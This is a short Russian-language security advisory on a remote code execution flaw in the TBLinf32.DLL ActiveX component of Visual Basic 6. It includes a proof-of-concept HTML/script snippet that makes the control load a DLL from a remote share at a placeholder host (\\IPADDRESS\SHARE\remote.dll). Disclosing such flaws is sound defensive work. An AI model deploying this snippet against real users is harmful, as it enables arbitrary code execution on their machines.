Программа:
Microsoft Visual Basic 6 TBLinf32.DLL ActiveX
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в TBLinf32.DLL ActiveX компоненте. Атакующий может заманить пользователя на специально составленный сайт, что приведет к выполнению произвольного кода и сценариев с привилегиями пользователя, запустившего браузер.
Пример:
<object width=1000 height=20 classid="CLSID:<CLASSID>" name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
